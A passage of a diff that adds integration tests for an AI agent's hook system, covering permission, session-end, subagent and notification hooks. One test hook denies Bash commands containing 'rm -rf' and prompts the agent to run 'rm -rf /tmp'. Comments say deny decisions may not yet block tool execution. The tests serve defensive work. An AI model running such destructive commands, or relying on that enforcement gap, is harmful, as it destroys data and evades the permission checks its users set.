enabled: true, + SessionEnd: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: blockScript, + name: 'session-end-seq-block-hook', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'session-end-seq-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await 
rig.run('Say test'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should handle multiple hooks all returning allow', async () => { + const allow1Script = + 'echo \'{"decision": "allow", "reason": "First allows"}\''; + const allow2Script = + 'echo \'{"decision": "allow", "reason": "Second allows"}\''; + + await rig.setup('session-end-multi-all-allow', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allow1Script, + name: 'session-end-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allow2Script, + name: 'session-end-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1Script = + 'echo {decision: "allow", hookSpecificOutput: {additionalContext: "context from session end hook 1"}}'; + const context2Script = + 'echo {decision: "allow", hookSpecificOutput: {additionalContext: "context from session end hook 2"}}'; + + await rig.setup('session-end-multi-context', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: context1Script, + name: 'session-end-context-1', + timeout: 5000, + }, + { + type: 'command', + command: context2Script, + name: 'session-end-context-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + + it('should handle hook with error alongside blocking hook', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + + await rig.setup('session-end-error-with-block', { + settings: { + hooks: { + enabled: true, + SessionEnd: 
[ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/command', + name: 'session-end-error-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say test'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should handle hook timeout alongside blocking hook', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + + await rig.setup('session-end-timeout-with-block', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 60', + name: 'session-end-timeout-hook', + timeout: 1000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say test'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should handle system messages from multiple hooks', async () => { + const msg1Script = + 'echo \'{"decision": "allow", "systemMessage": "System message 1 from SessionEnd"}\''; + const msg2Script = + 'echo \'{"decision": "allow", "systemMessage": "System message 2 from SessionEnd"}\''; + + await rig.setup('session-end-multi-system-msg', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: msg1Script, + name: 'session-end-msg-1', + timeout: 5000, + }, + { + type: 'command', + command: msg2Script, + name: 'session-end-msg-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); expect(result).toBeDefined(); }); }); @@ -1785,12 +3253,15 
@@ describe('Hooks System Integration', () => { // ========================================================================== // Combined Hooks - // Tests for using multiple hook types (UserPromptSubmit + Stop) together + // Tests for using multiple hook types together + // ========================================================================== + // Combined Hooks + // Tests for using multiple hook types together // ========================================================================== describe('Combined Hooks', () => { it('should execute both Stop and UserPromptSubmit hooks in same session', async () => { - const stopScript = 'echo {"decision": "allow"}'; - const upsScript = 'echo {"decision": "allow"}'; + const stopScript = 'echo \'{"decision": "allow"}\''; + const upsScript = 'echo \'{"decision": "allow"}\''; await rig.setup('combined-both-hooks', { settings: { @@ -1828,6 +3299,168 @@ describe('Hooks System Integration', () => { const result = await rig.run('Say both hooks'); expect(result).toBeDefined(); }); + + it('should execute multiple hook types together', async () => { + const upsScript = 'echo \'{"decision": "allow"}\''; + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('combined-ups-sessionend', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + UserPromptSubmit: [ + { + hooks: [ + { + type: 'command', + command: upsScript, + name: 'ups-hook', + timeout: 5000, + }, + ], + }, + ], + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-hook', + timeout: 5000, + }, + ], + }, + ], + }, + trusted: true, + }, + }); + + const result = await rig.run('Say hello with multiple hooks'); + expect(result).toBeDefined(); + }); + + it('should execute Stop, UserPromptSubmit and SessionEnd hooks together', async () => { + const stopScript = 'echo \'{"decision": "allow"}\''; + const upsScript = 'echo \'{"decision": "allow"}\''; + const sessionEndScript = 'echo \'{"decision": 
"allow"}\''; + + await rig.setup('combined-three-hooks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Stop: [ + { + hooks: [ + { + type: 'command', + command: stopScript, + name: 'stop-hook', + timeout: 5000, + }, + ], + }, + ], + UserPromptSubmit: [ + { + hooks: [ + { + type: 'command', + command: upsScript, + name: 'ups-hook', + timeout: 5000, + }, + ], + }, + ], + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-hook', + timeout: 5000, + }, + ], + }, + ], + }, + trusted: true, + }, + }); + + const result = await rig.run('Say hello with three hooks'); + expect(result).toBeDefined(); + }); + + it('should execute all hook types together', async () => { + const stopScript = 'echo \'{"decision": "allow"}\''; + const upsScript = 'echo \'{"decision": "allow"}\''; + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + const permissionScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('combined-all-hooks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Stop: [ + { + hooks: [ + { + type: 'command', + command: stopScript, + name: 'stop-hook', + timeout: 5000, + }, + ], + }, + ], + UserPromptSubmit: [ + { + hooks: [ + { + type: 'command', + command: upsScript, + name: 'ups-hook', + timeout: 5000, + }, + ], + }, + ], + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-hook', + timeout: 5000, + }, + ], + }, + ], + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: permissionScript, + name: 'permission-hook', + timeout: 5000, + }, + ], + }, + ], + }, + trusted: true, + }, + }); + + const result = await rig.run('Say hello with all hooks'); + expect(result).toBeDefined(); + }); }); // ========================================================================== @@ -1837,7 +3470,7 @@ describe('Hooks System Integration', () => { describe('Hook Script File Tests', () => { it('should execute hook from script 
file', async () => { const scriptFileHook = - 'echo {"decision": "allow", "reason": "Approved by script file", "hookSpecificOutput": {"additionalContext": "Script file executed successfully"}}'; + 'echo \'{"decision": "allow", "reason": "Approved by script file", "hookSpecificOutput": {"additionalContext": "Script file executed successfully"}}\''; await rig.setup('script-file-hook', { settings: { @@ -1893,4 +3526,2495 @@ describe('Hooks System Integration', () => { await expect(rig.run('Create a file')).rejects.toThrow(/block/i); }); }); + + // ========================================================================== + // PermissionRequest Hooks + // Tests for permission request lifecycle hooks that control tool access + // ========================================================================== + describe('PermissionRequest Hooks', () => { + describe('Single PermissionRequest Hook - Allow Scenarios', () => { + it('should allow tool execution when hook returns allow decision', async () => { + const allowScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Tool access granted by permission hook"}}\''; + + await rig.setup('permission-req-allow-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'permission-req-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Create a file test.txt with content "hello"', + ); + expect(result).toBeDefined(); + + const fileContent = rig.readFile('test.txt'); + expect(fileContent).toContain('hello'); + }); + + it('should allow specific tools based on tool name matching', async () => { + const allowSafeToolsScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + + if [ "$TOOL_NAME" = "Read" ] || [ "$TOOL_NAME" = "Grep" ]; then + echo '{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Safe tool access 
granted"}}' + else + echo '{}' + fi + `; + + await rig.setup('permission-req-allow-safe-tools', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: 'Read|Grep', + hooks: [ + { + type: 'command', + command: allowSafeToolsScript, + name: 'permission-req-allow-safe-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Test with a Read operation + const result = await rig.run('Read the package.json file'); + expect(result).toBeDefined(); + }); + }); + + describe('Single PermissionRequest Hook - Deny Scenarios', () => { + it('should deny tool execution when hook returns deny decision', async () => { + const denyScript = + 'echo \'{"decision": "deny", "reason": "Tool execution denied by security hook", "hookSpecificOutput": {"additionalContext": "Security policy violation"}}\''; + + await rig.setup('permission-req-deny-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: denyScript, + name: 'permission-req-deny-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Note: Currently the PermissionRequest deny decision may not block tool execution + // This test verifies that the hook is executed and returns the expected decision + const result = await rig.run( + 'Create a file denied.txt with content "should be blocked"', + ); + expect(result).toBeDefined(); + + // The hook is triggered but current implementation may not block execution + // This highlights the gap where deny decisions don't prevent tool execution + // In future, we'd expect the deny decision to block execution and result to contain deny-related message + }); + + it('should block dangerous operations based on tool input matching', async () => { + const blockDangerousOpsScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + COMMAND=$(echo "$INPUT" | jq -r '.tool_input.command // empty') + + if [ "$TOOL_NAME" = "Bash" ] && [[ 
"$COMMAND" == *"rm -rf"* ]]; then + echo '{"decision": "deny", "reason": "Dangerous command blocked", "hookSpecificOutput": {"additionalContext": "Security threat detected"}}' + else + echo '{"decision": "allow"}' + fi + `; + + await rig.setup('permission-req-block-dangerous', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: 'Bash', + hooks: [ + { + type: 'command', + command: blockDangerousOpsScript, + name: 'permission-req-block-dangerous-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // This command should ideally be blocked by the hook + // Note: Currently the PermissionRequest deny decision may not block tool execution + const result = await rig.run('Execute bash command: rm -rf /tmp'); + expect(result).toBeDefined(); + + // The hook system correctly identifies dangerous operations + // But current implementation may not fully enforce the deny decision + }); + }); + + describe('Multiple PermissionRequest Hooks - Allow Scenarios', () => { + it('should allow tool execution when all hooks return allow decision', async () => { + const allowScript1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "First permission check passed"}}\''; + const allowScript2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Second permission check passed"}}\''; + + await rig.setup('permission-req-multi-allow', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: allowScript1, + name: 'permission-req-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allowScript2, + name: 'permission-req-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Create a file multi-test.txt with content "multi allow"', + ); + expect(result).toBeDefined(); + + const fileContent = rig.readFile('multi-test.txt'); + 
expect(fileContent).toContain('multi allow'); + }); + + it('should allow execution with sequential permission checks', async () => { + const allowScript1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "First sequential check passed"}}\''; + const allowScript2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Second sequential check passed"}}\''; + + await rig.setup('permission-req-sequential-allow', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: allowScript1, + name: 'permission-req-seq-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allowScript2, + name: 'permission-req-seq-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Read this test file'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple PermissionRequest Hooks - Deny Scenarios', () => { + it('should deny tool execution when one hook returns deny decision in parallel', async () => { + const allowScript = 'echo \'{"decision": "allow"}\''; + const denyScript = + 'echo \'{"decision": "deny", "reason": "Denied by security policy"}\''; + + await rig.setup('permission-req-multi-one-denies', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'permission-req-allow-parallel', + timeout: 5000, + }, + { + type: 'command', + command: denyScript, + name: 'permission-req-deny-parallel', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Note: Currently the PermissionRequest deny decision may not block tool execution + // In a proper implementation, one deny decision among parallel hooks should block execution + const result = await rig.run( + 'Create a file blocked.txt with content "should not be created"', + ); + expect(result).toBeDefined(); + + // This test 
demonstrates the current behavior where deny decisions may not block execution + // Future implementation should ensure that a deny decision blocks the tool execution + }); + + it('should deny execution when first sequential hook denies', async () => { + const denyScript = + 'echo \'{"decision": "deny", "reason": "First check denied execution"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('permission-req-sequential-first-denies', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: denyScript, + name: 'permission-req-seq-deny-first', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'permission-req-seq-allow-second', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Note: Currently the PermissionRequest deny decision may not block tool execution + // In a proper implementation, the first deny decision should prevent subsequent hooks from executing + // and block the tool execution entirely + const result = await rig.run( + 'Try to write a file that should be blocked', + ); + expect(result).toBeDefined(); + + // This test highlights where the implementation could be strengthened + // to properly respect deny decisions in sequential hook execution + }); + }); + + describe('PermissionRequest Matcher Scenarios', () => { + it('should match specific tools with regex matcher', async () => { + const specificToolScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Specific tool matched and allowed"}}\''; + + await rig.setup('permission-req-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: 'Read|Write', + hooks: [ + { + type: 'command', + command: specificToolScript, + name: 'permission-req-specific-tool-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Read the 
current directory'); + expect(result).toBeDefined(); + }); + + it('should match all tools with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard matcher allowed all tools"}}\''; + + await rig.setup('permission-req-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PermissionRequest: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'permission-req-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // SubagentStart Hooks + // Triggered when a subagent is spawned via the Task tool + // ========================================================================== + describe('SubagentStart Hooks', () => { + describe('Single SubagentStart Hook', () => { + it('should execute SubagentStart hook when a subagent is launched', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Subagent start approved"}}\''; + + await rig.setup('subagent-start-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'subagent-start-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Use the Task tool to trigger SubagentStart + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello from subagent"', + ); + expect(result).toBeDefined(); + }); + + it('should inject additional context from SubagentStart hook', async () => { + const contextScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Security check passed for subagent"}}\''; + + await rig.setup('subagent-start-context', { + settings: { + hooksConfig: { enabled: true }, 
+ hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'subagent-start-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // The additional context should be available to the subagent + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should execute SubagentStart hook with additional context', async () => { + const contextScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Audit log created"}}\''; + + await rig.setup('subagent-start-context-only', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'subagent-start-context-only-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // The hook should be called and subagent should execute normally + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should handle error when SubagentStart hook command fails', async () => { + const errorScript = 'echo "some error output" >&2; exit 1'; + + await rig.setup('subagent-start-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: errorScript, + name: 'subagent-start-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Even with error hooks, the subagent should still run + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SubagentStart Hooks', () => { + it('should execute multiple SubagentStart hooks in parallel', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook1 executed"}}\''; + 
const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook2 executed"}}\''; + + await rig.setup('subagent-start-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-start-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-start-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked, so at least two marker lines are expected + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(2); + }); + + it('should execute multiple SubagentStart hooks sequentially', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook1 executed"}}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"hookSpecificOutput": {"additionalContext": "Hook2 executed"}}\''; + + await rig.setup('subagent-start-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-start-seq-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-start-seq-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked sequentially + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') +
.split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + // Two hooks are configured to append a marker line each, so expect at least two + expect(hookInvokeCount).toBeGreaterThanOrEqual(2); + }); + }); + + describe('SubagentStart Matcher Scenarios', () => { + it('should match specific agent types with exact matcher', async () => { + const specificAgentScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Specific agent type matched"}}\''; + + await rig.setup('subagent-start-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + matcher: 'Bash', + hooks: [ + { + type: 'command', + command: specificAgentScript, + name: 'subagent-start-specific-agent-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // This should trigger the hook since we're launching a bash subagent + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should match all agent types with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Wildcard matcher matched all agent types"}}\''; + + await rig.setup('subagent-start-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStart: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'subagent-start-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // SubagentStop Hooks + // Triggered when a subagent finishes responding + // ========================================================================== + describe('SubagentStop Hooks', () => { + describe('Single SubagentStop Hook', () => { + it('should execute SubagentStop
hook when a subagent finishes', async () => { + const hookScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Subagent stop processed"}}\''; + + await rig.setup('subagent-stop-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'subagent-stop-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Use the Task tool to trigger both SubagentStart and SubagentStop + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello from subagent"', + ); + expect(result).toBeDefined(); + }); + + it('should allow subagent to continue when SubagentStop hook blocks and requires continuation', async () => { + // Create a script that returns block only once, then allow + const blockOnceScript = + 'if [ -f hook_stop_state.txt ]; then echo \'{"decision": "allow"}\'; else echo "blocked_once" > hook_stop_state.txt; echo \'{"decision": "block", "reason": "File writing blocked by security policy, retrying..."}\'; fi'; + + await rig.setup('subagent-stop-block-once', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: blockOnceScript, + name: 'subagent-stop-block-once-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When SubagentStop hook blocks once, the subagent should receive the feedback and continue + const result = await rig.run( + 'Use the Task tool to create a bash subagent to write a test file with "hello"', + ); + expect(result).toBeDefined(); + + // Verify that the state file was created with expected content (indicating block was triggered once) + const stateContent = rig.readFile('hook_stop_state.txt'); + expect(stateContent).toContain('blocked_once'); + }); + + it('should handle error when SubagentStop hook command fails', async () => { + const errorScript = 'echo "some error output" >&2; exit 1'; 
+ + await rig.setup('subagent-stop-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: errorScript, + name: 'subagent-stop-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Even with error hooks, the subagent should still complete + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SubagentStop Hooks', () => { + it('should execute multiple SubagentStop hooks in parallel', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + + await rig.setup('subagent-stop-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-stop-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-stop-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(2); + }); + + it('should execute multiple SubagentStop hooks sequentially', async () => { + const hook1Script = + '(echo "hook1_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + const hook2Script = + '(echo "hook2_called" >> hook_invoke_count.txt &) ; echo \'{"decision": "allow"}\''; + + await rig.setup('subagent-stop-sequential', { + settings: { + 
hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: hook1Script, + name: 'subagent-stop-seq-hook1', + timeout: 5000, + }, + { + type: 'command', + command: hook2Script, + name: 'subagent-stop-seq-hook2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + + // Both hooks should have been invoked sequentially + const hookInvokeCount = rig + .readFile('hook_invoke_count.txt') + .split('\n') + .filter( + (line) => + line.trim() === 'hook1_called' || line.trim() === 'hook2_called', + ).length; + expect(hookInvokeCount).toBeGreaterThanOrEqual(2); + }); + }); + + describe('SubagentStop Matcher Scenarios', () => { + it('should match specific agent types with exact matcher', async () => { + const specificAgentScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Specific agent type matched and allowed at stop"}}\''; + + await rig.setup('subagent-stop-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + matcher: 'Bash', + hooks: [ + { + type: 'command', + command: specificAgentScript, + name: 'subagent-stop-specific-agent-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // This should trigger the hook since we're launching a bash subagent + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + + it('should match all agent types with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard matcher allowed all agent types at stop"}}\''; + + await rig.setup('subagent-stop-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + SubagentStop: [ + { + matcher: '*', + 
hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'subagent-stop-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Use the Task tool to create a bash subagent that says "hello"', + ); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // Notification Hooks + // Triggered when various notification events occur + // ========================================================================== + describe('Notification Hooks', () => { + describe('Idle Prompt Notifications', () => { + it('should handle idle prompt notifications correctly', async () => { + const idlePromptScript = + 'echo \'{"additionalContext": "Idle prompt notification processed"}\''; + await rig.setup('notification-idle-prompt', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: idlePromptScript, + name: 'notification-idle-prompt-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Simulate an idle prompt scenario - this might involve simulating a timeout + const result = await rig.run('Say idle prompt notification test'); + + expect(result).toBeDefined(); + }); + + it('should process multiple idle prompt notifications', async () => { + const idlePromptScript1 = + 'echo \'{"additionalContext": "First idle prompt notification"}\''; + const idlePromptScript2 = + 'echo \'{"additionalContext": "Second idle prompt notification"}\''; + await rig.setup('notification-idle-prompt-multiple', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: idlePromptScript1, + name: 'notification-idle-prompt-hook-1', + timeout: 5000, + }, + { + type: 'command', + command: idlePromptScript2, + name: 'notification-idle-prompt-hook-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await 
rig.run( + 'Say multiple idle prompt notification test', + ); + + expect(result).toBeDefined(); + }); + }); + + describe('Elicitation Dialog Notifications', () => { + it('should handle elication dialog notifications correctly', async () => { + const elicationDialogScript = + 'echo \'{"additionalContext": "Elicitation dialog notification processed"}\''; + + await rig.setup('notification-elication-dialog', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: elicationDialogScript, + name: 'notification-elication-dialog-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Run a prompt with the Notification hook configured (NOTE(review): confirm this prompt actually raises an elicitation dialog notification) + const result = await rig.run('Say elication dialog notification test'); + + expect(result).toBeDefined(); + }); + + it('should handle multiple elication dialog notifications', async () => { + const elicationDialogScript1 = + 'echo \'{"additionalContext": "First elication dialog notification"}\''; + const elicationDialogScript2 = + 'echo \'{"additionalContext": "Second elication dialog notification"}\''; + await rig.setup('notification-elication-dialog-multiple', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: elicationDialogScript1, + name: 'notification-elication-dialog-hook-1', + timeout: 5000, + }, + { + type: 'command', + command: elicationDialogScript2, + name: 'notification-elication-dialog-hook-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Say multiple elication dialog notification test', + ); + + expect(result).toBeDefined(); + }); + + it('should handle elication dialog notification with error', async () => { + await rig.setup('notification-elication-dialog-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: 'nonexistent_command_xyz', + name:
